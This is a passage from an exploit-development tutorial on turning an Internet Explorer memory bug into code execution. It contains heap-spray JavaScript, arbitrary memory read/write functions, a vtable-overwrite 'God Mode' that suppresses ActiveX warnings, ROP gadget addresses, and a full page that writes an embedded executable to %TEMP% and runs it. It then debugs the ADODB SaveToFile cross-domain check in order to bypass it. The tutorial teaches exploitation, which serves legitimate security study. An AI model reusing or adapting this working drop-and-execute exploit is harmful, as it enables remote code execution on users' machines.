 point. So the complete schema is the following:
 
X = address of ActiveXObject
 
X = [X+28h]
 
X = [X+4]
 
object = [X+1f0h]
 
Let’s verify that our findings are correct. To do so, use the following javascript code:
 
XHTML
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 413 
-
 
<html>
 
<head>
 
<script
 language=
"javascript
"
>
 
  
a
 
=
 
new
 
Array
(
0x2000
);
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x2000
;
 
++
i
)
 
{
 
    
a
[
i
]
 
=
 
new
 
Array
((
0x10000
 
-
 
0x20
)/
4
);
 
    
for
 
(
var
 
j
 
=
 
0
;
 
j
 
<
 
0x1000
;
 
++
j
)
 
      
a
[
i
][
j
]
 
=
 
ActiveXObject
;
 
  
}
 
  
alert
(
"Done"
);
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
Open it in IE and
 in WinDbg examine the memory at the address 
0xadd0000
 (or higher, if you want). The 
memory should be filled with the address of 
ActiveXObject
. In my case, the address is 
03411150
. Now let’s 
reach the address of 
object
:
 
0:002> ? poi(03411150+28)
 
Evaluate e
xpression: 51132616 = 030c38c8
 
0:002> ? poi(030c38c8+4)
 
Evaluate expression: 51075360 = 030b5920
 
0:002> ? poi(030b5920+1f0)
 
Evaluate expression: 0 = 00000000
 
The address is 
0
. Why? Look again at the following picture:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 414 
-
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 415 
-
 
 
So, to initialize the pointer to 
o
bject
, we need to call 
CanCreateObject
, i.e. we need to create an ActiveX 
object. Let’s change the javascript code this way:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
new
 
ActiveXObject
(
"WScript.shell"
);
 
  
a
 
=
 
new
 
Array
(
0x2000
);
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x2000
;
 
++
i
)
 
{
 
    
a
[
i
]
 
=
 
new
 
Array
((
0x10000
 
-
 
0x20
)/
4
);
 
    
for
 
(
var
 
j
 
=
 
0
;
 
j
 
<
 
0x1000
;
 
++
j
)
 
      
a
[
i
][
j
]
 
=
 
ActiveXObject
;
 
  
}
 
  
alert
(
"Done"
);
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
Repeat the process and try again to get the address of the obj
ect:
 
0:005> ? poi(03411150+28)
 
Evaluate expression: 51459608 = 03113618
 
0:005> ? poi(03113618+4)
 
Evaluate expression: 51075360 = 030b5920
 
0:005> ? poi(030b5920+1f0)
 
Evaluate expression: 6152384 = 005de0c0
 
0:005> dd 005de0c0
 
005de0c0  6d0f55e0 00000001 6c4d
7408 00589620
 
005de0d0  6c532ac0 00000000 00000000 00000000
 
005de0e0  00000005 00000000 3fd6264b 8c000000
 
005de0f0  005579b8 005de180 005579b8 5e6c858f
 
005de100  47600e22 33eafe9a 7371b617 005a0a08
 
005de110  00000000 00000000 3fd62675 8c000000
 
005de120  00
5882d0 005579e8 00556e00 5e6c858f
 
005de130  47600e22 33eafe9a 7371b617 005ce140
 
0:005> ln 6d0f55e0
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 416 
-
 
(6d0f55e0)   MSHTML!s_apfnPlainTearoffVtable   |  (6d0f5ce8)   MSHTML!s_apfnEmbeddedDocTearoffVtable
 
Exact matches:
 
    MSHTML!s_apfnPlainTearoffVtable = <no
 type information>
 
Perfect: now it works!
 
Now we can complete our javascript code:
 
JavaScript
 
 
var
 
old
 
=
 
read
(
mshtml
+
0xc555e0
+
0x14
);
 
 
write
(
mshtml
+
0xc555e0
+
0x14
,
 
jscript9
+
0xdc164
);
      
// God Mode On!
 
    
var
 
shell
 
=
 
new
 
ActiveXObject
(
"WScript.sh
ell"
);
 
    
write
(
mshtml
+
0xc555e0
+
0x14
,
 
old
);
                   
// God Mode Off!
 
 
addr
 
=
 
get_addr
(
ActiveXObject
);
 
    
var
 
pp_obj
 
=
 
read
(
read
(
addr
 
+
 
0x28
)
 
+
 
4
)
 
+
 
0x1f0
;
       
// ptr to ptr to object
 
 
Note that we can use the “old” 
God Mode
 to create 
WSc
ript.shell
 without showing the warning message.
 
Here’s the full code:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
(
function
()
 
{
 
    
alert
(
"Starting!"
);
 
 
//
-----------------------------------------------------
 
    
// From one
-
byte
-
write to fu
ll process space read/write
 
    
//
-----------------------------------------------------
 
    
a
 
=
 
new
 
Array
();
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
   
// .
 
    
// .
 
    
// .
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf)
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
for
 
(
i
 
=
 
0
;
 
i
 
<
 
0x300
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0
x3c00
);
 
      
if
 
(
i
 
==
 
0x100
)
 
        
buf
 
=
 
new
 
ArrayBuffer
(
0x58
);
      
// must be exactly 0x58!
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 417 
-
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
0x123
;
 
    
}
 
    
//    0x0:  ArrayDataHead
 
    
//   0x20:  array[0] address
 
    
//   0x24:  arra
y[1] address
 
    
//   ...
 
    
// 0xf000:  Int32Array
 
    
// 0xf030:  Int32Array
 
    
//   ...
 
    
// 0xffc0:  Int32Array
 
    
// 0xfff0:  align data
 
    
for
 
(;
 
i
 
<
 
0x300
 
+
 
0x400
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3bf8
)
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
new
 
Int32Array
(
buf
)
 
    
}
 
    
//            vftptr
 
    
// 0c0af000: 70583b60 031c98a0 00000000 00000003 00000004 00000000 20000016 08ce0020
 
    
// 0c0af020: 03133de0                                             array_len buf_addr
 
    
//      
    jsArrayBuf
 
    
alert
(
"Set byte at 0c0af01b to 0x20"
);
 
    
// Now let's find the Int32Array whose length we modified.
 
    
int32array
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x300
;
 
i
 
<
 
0x300
 
+
 
0x400
;
 
++
i
)
 
{
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
{
 
        
if
 
(
a
[
i
][
j
].
length
 
!=
 
0x58
/
4
)
 
{
 
          
int32array
 
=
 
a
[
i
][
j
];
 
          
break
;
 
        
}
 
      
}
 
      
if
 
(
int32array
 
!=
 
0
)
 
        
break
;
 
    
}
 
    
if
 
(
int32array
 
==
 
0
)
 
{
 
      
alert
(
"Can't find int32array!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
 
    
// 
This is just an example.
 
    
// The buffer of int32array starts at 03c1f178 and is 0x58 bytes.
 
    
// The next LargeHeapBlock, preceded by 8 bytes of header, starts at 03c1f1d8.
 
    
// The value in parentheses, at 03c1f178+0x60+0x24, points to the followin
g
 
    
// LargeHeapBlock.
 
    
//
 
    
// 03c1f178: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
 
    
// 03c1f198: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
 
    
// 03c1f1b8: 00000000 00000000 00000000 00
000000 00000000 00000000 014829e8 8c000000
 
    
// 03c1f1d8: 70796e18 00000003 08100000 00000010 00000001 00000000 00000004 0810f020
 
    
// 03c1f1f8: 08110000(03c1f238)00000000 00000001 00000001 00000000 03c15b40 08100000
 
    
// 03c1f218: 00000000 00000000 
00000000 00000004 00000001 00000000 01482994 8c000000
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 418 
-
 
    
// 03c1f238: ...
 
 
// We check that the structure above is correct (we check the first LargeHeapBlocks).
 
    
// 70796e18 = jscript9!LargeHeapBlock::`vftable' = jscript9 + 0x6e18
 
    
var
 
vftptr1
 
=
 
int32array
[
0x60
/
4
],
 
        
vftptr2
 
=
 
int32array
[
0x60
*
2
/
4
],
 
        
vftptr3
 
=
 
int32array
[
0x60
*
3
/
4
],
 
        
nextPtr1
 
=
 
int32array
[(
0x60
+
0x24
)/
4
],
 
        
nextPtr2
 
=
 
int32array
[(
0x60
*
2
+
0x24
)/
4
],
 
        
nextPtr3
 
=
 
int32array
[(
0x60
*
3
+
0x24
)/
4
];
 
    
if
 
(
vftp
tr1
 
&
 
0xffff
 
!=
 
0x6e18
 
||
 
vftptr1
 
!=
 
vftptr2
 
||
 
vftptr2
 
!=
 
vftptr3
 
||
 
        
nextPtr2
 
-
 
nextPtr1
 
!=
 
0x60
 
||
 
nextPtr3
 
-
 
nextPtr2
 
!=
 
0x60
)
 
{
 
      
alert
(
"Error!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
  
 
buf_addr
 
=
 
nextPtr1
 
-
 
0x60
*
2
;
 
    
// Now we modify int32array again to gain full address space read/write access.
 
    
if
 
(
int32array
[(
0x0c0af000
+
0x1c
 
-
 
buf_addr
)/
4
]
 
!=
 
buf_addr
)
 
{
 
      
alert
(
"Error!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
  
 
int32array
[(
0x0c0af0
00
+
0x18
 
-
 
buf_addr
)/
4
]
 
=
 
0x20000000
;
        
// new length
 
    
int32array
[(
0x0c0af000
+
0x1c
 
-
 
buf_addr
)/
4
]
 
=
 
0
;
                 
// new buffer address
 
    
function
 
read
(
address
)
 
{
 
      
var
 
k
 
=
 
address
 
&
 
3
;
 
      
if
 
(
k
 
==
 
0
)
 
{
 
        
// ####
 
        
return
 
i
nt32array
[
address
/
4
];
 
      
}
 
      
else
 
{
 
        
alert
(
"to debug"
);
 
        
// .### #... or ..## ##.. or ...# ###.
 
        
return
 
(
int32array
[(
address
-
k
)/
4
]
 
>>
 
k
*
8
)
 
|
 
               
(
int32array
[(
address
-
k
+
4
)/
4
]
 
<<
 
(
32
 
-
 
k
*
8
));
 
      
}
 
    
}
 
    
func
tion
 
write
(
address
,
 
value
)
 
{
 
      
var
 
k
 
=
 
address
 
&
 
3
;
 
      
if
 
(
k
 
==
 
0
)
 
{
 
        
// ####
 
        
int32array
[
address
/
4
]
 
=
 
value
;
 
      
}
 
      
else
 
{
 
        
// .### #... or ..## ##.. or ...# ###.
 
        
alert
(
"to debug"
);
 
        
var
 
low
 
=
 
int32array
[(
address
-
k
)/
4
];
 
        
var
 
high
 
=
 
int32array
[(
address
-
k
+
4
)/
4
];
 
        
var
 
mask
 
=
 
(
1
 
<<
 
k
*
8
)
 
-
 
1
;
  
// 0xff or 0xffff or 0xffffff
 
        
low
 
=
 
(
low
 
&
 
mask
)
 
|
 
(
value
 
<<
 
k
*
8
);
 
        
high
 
=
 
(
high
 
&
 
(
0xffffffff
 
-
 
mask
))
 
|
 
(
value
 
>>
 
(
32
 
-
 
k
*
8
));
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 419 
-
 
        
int32
array
[(
address
-
k
)/
4
]
 
=
 
low
;
 
        
int32array
[(
address
-
k
+
4
)/
4
]
 
=
 
high
;
 
      
}
 
    
}
 
    
//
---------
 
    
// God mode
 
    
//
---------
 
    
// At 0c0af000 we can read the vfptr of an Int32Array:
 
    
//   jscript9!Js::TypedArray<int>::`vftable' @ js
cript9+3b60
 
    
jscript9
 
=
 
read
(
0x0c0af000
)
 
-
 
0x3b60
;
 
    
// Now we need to determine the base address of MSHTML. We can create an HTML
 
    
// object and write its reference to the address 0x0c0af000
-
4 which corresponds
 
    
// to the last element of o
ne of our arrays.
 
    
// Let's find the array at 0x0c0af000
-
4.
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
      
a
[
i
][
0x3bf7
]
 
=
 
0
;
 
    
// We write 3 in the last position of one of our arrays. IE encodes the number x
 
    
// as 2*x+1 so that it can
 tell addresses (dword aligned) and numbers apart.
 
    
// Either we use an odd number or a valid address otherwise IE will crash in the
 
    
// following for loop.
 
    
write
(
0x0c0af000
-
4
,
 
3
);
 
    
leakArray
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
      
if
 
(
a
[
i
][
0x3bf7
]
 
!=
 
0
)
 
{
 
        
leakArray
 
=
 
a
[
i
];
 
        
break
;
 
      
}
 
    
}
 
    
if
 
(
leakArray
 
==
 
0
)
 
{
 
      
alert
(
"Can't find leakArray!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
 
    
function
 
get_addr
(
obj
)
 
{
 
      
leakArray
[
0x3b
f7
]
 
=
 
obj
;
 
      
return
 
read
(
0x0c0af000
-
4
,
 
obj
);
 
    
}
 
    
// Back to determining the base address of MSHTML...
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!Projection::ArrayObjectInstance::`vftable'
 
    
//      v
 
    
//
   70792248 0c012b40 00000000 00000003
 
    
//   73b38b9a 00000000 00574230 00000000
 
    
//      ^
 
    
//      +
----
 MSHTML!CBaseTypeOperations::CBaseFinalizer = mshtml + 0x58b9a
 
    
var
 
addr
 
=
 
get_addr
(
document.createElement
(
"div"
));
 
    
mshtml
 
=
 
read
(
addr
 
+
 
0x10
)
 
-
 
0x58b9a
;
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 420 
-
 
    
//                                                  vftable
 
    
//                                    +
-----
> +
------------------
+
 
    
//                                    |       |                  |
 
    
//                      
              |       |                  |
 
    
//                                    |  0x10:| jscript9+0x10705e| 
--
> "XCHG EAX,ESP | ADD EAX,71F84DC0 |
 
    
//                                    |       |                  |      MOV EAX,ESI | POP ESI | RET
N"
 
    
//                                    |  0x14:| jscript9+0xdc164 | 
--
> "LEAVE | RET 4"
 
    
//                                    |       +
------------------
+
 
    
//                 object             |
 
    
// EAX 
---
> +
-------------------
+     |
 
   
//          | vftptr            |
-----
+
 
    
//          | jscript9+0x15f800 | 
--
> "XOR EAX,EAX | RETN"
 
    
//          | jscript9+0xf3baf  | 
--
> "XCHG EAX,EDI | RETN"
 
    
//          | jscript9+0xdc361  | 
--
> "LEAVE | RET 4"
 
    
//          +
-------------
------
+
 
 
var
 
old
 
=
 
read
(
mshtml
+
0xc555e0
+
0x14
);
 
 
write
(
mshtml
+
0xc555e0
+
0x14
,
 
jscript9
+
0xdc164
);
      
// God Mode On!
 
    
var
 
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
    
write
(
mshtml
+
0xc555e0
+
0x14
,
 
old
);
                   
// God Mode Off!
 
 
addr
 
=
 
get_addr
(
ActiveXObject
);
 
    
var
 
pp_obj
 
=
 
read
(
read
(
addr
 
+
 
0x28
)
 
+
 
4
)
 
+
 
0x1f0
;
       
// ptr to ptr to object
 
    
var
 
old_objptr
 
=
 
read
(
pp_obj
);
 
    
var
 
old_vftptr
 
=
 
read
(
old_objptr
);
 
    
// Create the new vftable.
 
    
var
 
new_vftable
 
=
 
ne
w
 
Int32Array
(
0x708
/
4
);
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
new_vftable.length
;
 
++
i
)
 
      
new_vftable
[
i
]
 
=
 
read
(
old_vftptr
 
+
 
i
*
4
);
 
    
new_vftable
[
0x10
/
4
]
 
=
 
jscript9
+
0x10705e
;
 
    
new_vftable
[
0x14
/
4
]
 
=
 
jscript9
+
0xdc164
;
 
    
var
 
new_vftptr
 
=
 
read
(
get_addr
(
new_vftable
)
 
+
 
0x1c
);
        
// ptr to raw buffer of new_vftable
 
    
// Create the new object.
 
    
var
 
new_object
 
=
 
new
 
Int32Array
(
4
);
 
    
new_object
[
0
]
 
=
 
new_vftptr
;
 
    
new_object
[
1
]
 
=
 
jscript9
 
+
 
0x15f800
;
 
    
new_object
[
2
]
 
=
 
jscript9
 
+
 
0xf3baf
;
 
    
new_object
[
3
]
 
=
 
jscript9
 
+
 
0xdc361
;
 
    
var
 
new_objptr
 
=
 
read
(
get_addr
(
new_object
)
 
+
 
0x1c
);
         
// ptr to raw buffer of new_object
 
    
function
 
GodModeOn
()
 
{
 
      
write
(
pp_obj
,
 
new_objptr
);
 
    
}
 
    
function
 
GodModeOff
()
 
{
 
      
write
(
pp_obj
,
 
old_objpt
r
);
 
    
}
 
    
// content of exe file encoded in base64.
 
    
runcalc
 
=
 
'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAA <snipped> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
;
 
    
function
 
createExe
(
fname
,
 
data
)
 
{
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 421 
-
 
      
GodModeOn
();
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"
ADODB.Stream"
);
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
GodModeOff
();
 
      
tStream.Type
 
=
 
2
;
       
// text
 
      
bStream.Type
 
=
 
1
;
       
// binary
 
      
tStream.Open
();
 
      
bStream.Open
();
 
      
tStream.WriteText
(
data
);
 
     
tStream.Position
 
=
 
2
;
       
// skips the first 2 bytes in the tStream (what are they?)
 
      
tStream.CopyTo
(
bStream
);
 
      
bStream.SaveToFile
(
fname
,
 
2
);
       
// 2 = overwrites file if it already exists
 
      
tStream.Close
();
 
      
bStream.Close
();
 
    
}
 
    
function
 
decode
(
b64Data
)
 
{
 
      
var
 
data
 
=
 
window.atob
(
b64Data
);
 
      
// Now data is like
 
      
//   11 00 12 00 45 00 50 00 ...
 
      
// rather than like
 
      
//   11 12 45 50 ...
 
      
// Let's fix this!
 
      
var
 
arr
 
=
 
new
 
Array
();
 
      
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
data.length
 
/
 
2
;
 
++
i
)
 
{
 
        
var
 
low
 
=
 
data.charCodeAt
(
i
*
2
);
 
        
var
 
high
 
=
 
data.charCodeAt
(
i
*
2
 
+
 
1
);
 
        
arr.push
(
String.fromCharCode
(
low
 
+
 
high
 
*
 
0x100
));
 
      
}
 
      
return
 
arr.join
(
''
);
 
    
}
 
 
fname
 
=
 
shell.E
xpandEnvironmentStrings
(
"%TEMP%
\
\
runcalc.exe"
);
 
    
createExe
(
fname
,
 
decode
(
runcalc
));
 
    
shell.Exec
(
fname
);
 
 
alert
(
"All done!"
);
 
  
})();
 
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
I snipped 
runcalc
. You can download the full code from here: 
code2
.
 
If you open the html file in IE without using 
SimpleServer
, everything should work fine. But if you use 
SimpleServer and open the page by going to 
127.0.0.1
 in IE, then i
t doesn’t work. We’ve seen this error 
message before:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 422 
-
 
 
Crossing Domains
 
The line of code which throws the error is the one indicate
d here:
 
JavaScript
 
 
function
 
createExe
(
fname
,
 
data
)
 
{
 
      
GodModeOn
();
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
GodModeOff
();
 
      
tStream
.
Type
 
=
 
2
;
       
// text
 
    
bStream
.
Type
 
=
 
1
;
       
// binary
 
      
tStream
.
Open
();
 
      
bStream
.
Open
();
 
      
tStream
.
WriteText
(
data
);
 
      
tStream
.
Position
 
=
 
2
;
       
// skips the first 2 bytes in the tStream (what are they?)
 
      
tStream
.
CopyTo
(
bStream
);
 
      
bStream
.
SaveToF
ile
(
fname
,
 
2
);
       
<
-----------------------------
 
error
 
here
 
      
tStream
.
Close
();
 
      
bStream
.
Close
();
 
    
}
 
 
The error message is “
SCRIPT3716: Safety settings on this computer prohibit accessing a data source on 
another domain.
“. So, let’s reload ou
r html page using SimpleServer, change the length of the 
Int32Array
 
and let the code throw the error. We note that some additional modules were loaded:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 423 
-
 
ModLoad: 0eb50000 0eb71000   C:
\
Windows
\
SysWOW64
\
wshom.ocx
 
ModLoad: 749d0000 749e2000   C:
\
Windows
\
SysWO
W64
\
MPR.dll
 
ModLoad: 0eb80000 0ebaa000   C:
\
Windows
\
SysWOW64
\
ScrRun.dll
 
ModLoad: 0ebb0000 0ec0f000   C:
\
Windows
\
SysWOW64
\
SXS.DLL
 
ModLoad: 6e330000 6e429000   C:
\
Program Files (x86)
\
Common Files
\
System
\
ado
\
msado15.dll   <
-------------
 
ModLoad: 72f00000 72f1
f000   C:
\
Windows
\
SysWOW64
\
MSDART.DLL
 
ModLoad: 6e570000 6e644000   C:
\
Program Files (x86)
\
Common Files
\
System
\
Ole DB
\
oledb32.dll
 
ModLoad: 74700000 74717000   C:
\
Windows
\
SysWOW64
\
bcrypt.dll
 
ModLoad: 72150000 72164000   C:
\
Program Files (x86)
\
Common Files
\
Sy
stem
\
Ole DB
\
OLEDB32R.DLL
 
ModLoad: 738c0000 738c2000   C:
\
Program Files (x86)
\
Common Files
\
System
\
ado
\
msader15.dll   <
-------------
 
(15bc.398): C++ EH exception 
-
 code e06d7363 (first chance)
 
(15bc.398): C++ EH exception 
-
 code e06d7363 (first chance)
 
Two m
odules look particularly interesting: 
msado15.dll
 and 
msader15.dll
. They’re located in the directory 
ado
. It doesn’t take a genius to understand, or at least suspect, that those modules are related to 
ADODB
.
 
Let’s see if we can find a function named 
SaveTo
File
 in one of those two modules:
 
0:004> x msad*!*savetofile*
 
6e3e9ded          msado15!CStream::SaveToFile (<no parameter info>)
 
6e3ccf19          msado15!CRecordset::SaveToFile (<no parameter info>)
 
The first function seems to be what we’re looking for. 
Let’s put a breakpoint on it and reload the page. As we 
hoped, the execution breaks on 
msado15!CStream::SaveToFile
. The name of the function suggests that the 
module is written in 
C++
 and that 
SaveToFile
 is a method of the class 
CStream
. 
ESI
 should point t
o an 
object of that class:
 
0:007> dd esi
 
0edbb328  6e36fd28 6e36fd00 6e36fcf0 6e33acd8
 
0edbb338  00000004 00000000 00000000 00000000
 
0edbb348  00000000 00000000 00000000 6e36fce0
 
0edbb358  6e33acc0 6e36fccc 00000000 00000904
 
0edbb368  00000001 04e4c2bc 000
00000 6e36fc94
 
0edbb378  0edbb3b8 00000000 0edbb490 00000000
 
0edbb388  00000001 ffffffff 00000000 00000000
 
0edbb398  00000007 000004b0 00000000 00000000
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 424 
-
 
0:007> ln poi(esi)
 
(6e36fd28)   msado15!ATL::CComObject<CStream>::`vftable'   |  (6e36fdb8)   msado15!`
CStream::_GetEntries'::`2'::_entrie
s
 
Exact matches:
 
    msado15!ATL::CComObject<CStream>::`vftable' = <no type information>
 
OK, it seems we’re on the right track.
 
Now let’s step through 
SaveToFile
 to find out where it fails. During our tracing we come acro
ss a very 
interesting call:
 
6e3ea0a9 0f8496000000    je      msado15!CStream::SaveToFile+0x358 (6e3ea145)
 
6e3ea0af 50              push    eax
 
6e3ea0b0 53              push    ebx
 
6e3ea0b1 e88f940000      call    msado15!SecurityCheck (6e3f3545)     <
-----
--------------
 
6e3ea0b6 83c408          add     esp,8
 
6e3ea0b9 85c0            test    eax,eax
 
6e3ea0bb 0f8d84000000    jge     msado15!CStream::SaveToFile+0x358 (6e3ea145)
 
SecurityCheck
 takes two parameters. Let’s start by examining the first one:
 
0:007> 
dd eax
 
04e4c2bc  00740068 00700074 002f003a 0031002f
 
04e4c2cc  00370032 0030002e 0030002e 0031002e
 
04e4c2dc  0000002f 00650067 00000000 6ff81c09
 
04e4c2ec  8c000000 000000e4 00000000 00000000
 
04e4c2fc  0024d46c 0024d46c 0024cff4 00000013
 
04e4c30c  00000000 
0000ffff 0c000001 00000000
 
04e4c31c  00000000 6ff81c30 88000000 00000001
 
04e4c32c  0024eee4 00000000 6d74682f 61202c6c
 
Mmm... that looks like a 
Unicode
 string. Let’s see if we’re right:
 
0:007> du eax
 
04e4c2bc  "http://127.0.0.1/"
 
That’s the 
URL
 of the page! 
What about 
ebx
? Let’s see:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 425 
-
 
0:007> dd ebx
 
001d30c4  003a0043 0055005c 00650073 00730072
 
001d30d4  0067005c 006e0061 00610064 0066006c
 
001d30e4  0041005c 00700070 00610044 00610074
 
001d30f4  004c005c 0063006f 006c0061 0054005c
 
001d3104  006d0065 005c0070 006
f004c 005c0077
 
001d3114  00750072 0063006e 006c0061 002e0063
 
001d3124  00780065 00000065 00000000 00000000
 
001d3134  40080008 00000101 0075006f 00630072
 
0:007> du ebx
 
001d30c4  "C:
\
Users
\
gandalf
\
AppData
\
Local
\
T"
 
001d3104  "emp
\
Low
\
runcalc.exe"
 
That’s the f
ull path of the file we’re trying to create. Is it possible that those two URLs/paths are related to the 
domains
 the error message is referring to? Maybe the two domains are 
http://127.0.0.1/
 and 
C:
\
.
 
Probably, 
SecurityCheck
 checks that the two arguments r
epresent the same domain.
 
Let’s see what happens if we modify the first parameter:
 
0:007> ezu @eax "C:
\
\
"
 
0:007> du @eax
 
04e4c2bc  "C:
\
"
 
The command 
ezu
 is used to 
(e)dit a (z)ero
-
terminated (u)nicode string
. Now that we modified the second 
argument, let’s
 resume execution and see what happens.
 
The calculator pops up!!! Yeah!!!
 
Now we need a way to do the same from javascript. Is it possible? The best way to find out is to 
disassemble 
msado15.dll
 with IDA. Once in IDA, search for the function 
SecurityCheck
 
(
CTRL+P
 and click 
on 
Search
), then click on the signature of 
SecurityCheck
, press 
CTRL+X
 and double click on 
CStream::SaveToFile
. Function 
SaveToFile
 is huge, but let’s not worry too much about it. We just need to 
analyze a very small portion of it. Let’s 
start by following the second argument:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 426 
-
 
 
As we can see, 
EAX
 comes from 
[ESI+44h]
. 
ESI
 should be the pointer 
this
, which points to t
he current 
CStream
 object, but let’s make sure of it. In order to analyze the graph more comfortably, we can group all 
the nodes which are below the node with the call to 
SecurityCheck
. To do so, zoom out by holding down 
CTRL
 while rotating the 
mouse wheel
, select the nodes by holding down 
CTRL
 and using the mouse 
left 
button
, and, finally, 
right click
 and select 
Group nodes
. Here’s the reduced graph:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 427 
-
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 428 
-
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 429 
-
 
 
It’s quite clear that 
ESI
 is indeed the pointer 
this
. This is good because the variable 
bStream
 in ou
r javascript 
probably points to the same object. Let’s find out if we’re right. To do so, let’s leak 
bStream
 by modifying our 
javascript code as follows:
 
JavaScript
 
 
function
 
createExe
(
fname
,
 
data
)
 
{
 
      
GodModeOn
();
 
      
var
 
tStream
 
=
 
new
 
ActiveXOb
ject
(
"ADODB.Stream"
);
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
GodModeOff
();
 
      
tStream
.
Type
 
=
 
2
;
       
// text
 
      
bStream
.
Type
 
=
 
1
;
       
// binary
 
      
tStream
.
Open
();
 
      
bStream
.
Open
();
 
      
tStream
.
WriteText
(
data
);
 
      
tStream
.
Position
 
=
 
2
;
       
// skips the first 2 bytes in the tStream (what are they?)
 
      
tStream
.
CopyTo
(
bStream
);
 
      
alert
(
get_addr
(
bStream
).
toString
(
16
));
        
// <
-----------------------------
 
      
bStream
.
SaveToFile
(
fname
,
 
2
);
       
// 
2 = overwrites file if it already exists
 
      
tStream
.
Close
();
 
      
bStream
.
Close
();
 
    
}
 
 
Load the page in IE using SimpleServer and in WinDbg put a breakpoint on 
SaveToFile
:
 
bm msado15!CStream::SaveToFile
 
The alert box will pop up with the address of 
bStream
. In my case, the address is 
3663f40h
. After we close 
the alert box, the breakpoint is triggered. The address of the 
CStream
 is 
ESI
, which in my case is 
0e8cb328h
. Let’s examine the memory at the address 
3663f40h
 (our 
bStream
):
 
0:007> dd 3663f40h
 
03
663f40  71bb34c8 0e069a00 00000000 0e5db030
 
03663f50  05a30f50 03663f14 032fafd4 00000000
 
03663f60  71c69a44 00000008 00000009 00000000
 
03663f70  0e8cb248 00000000 00000000 00000000
 
03663f80  71c69a44 00000008 00000009 00000000
 
03663f90  0e8cb328 00000000 
00000000 00000000    <
-------------
 ptr to CStream!
 
03663fa0  71c69a44 00000008 00000009 00000000
 
03663fb0  0e8cb248 00000000 00000000 00000000
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 430 
-
 
We can see that at offset 
0x50
 we have the pointer to the object 
CStream
 whose 
SaveToFile
 method is 
called in 
ms
ado15.dll
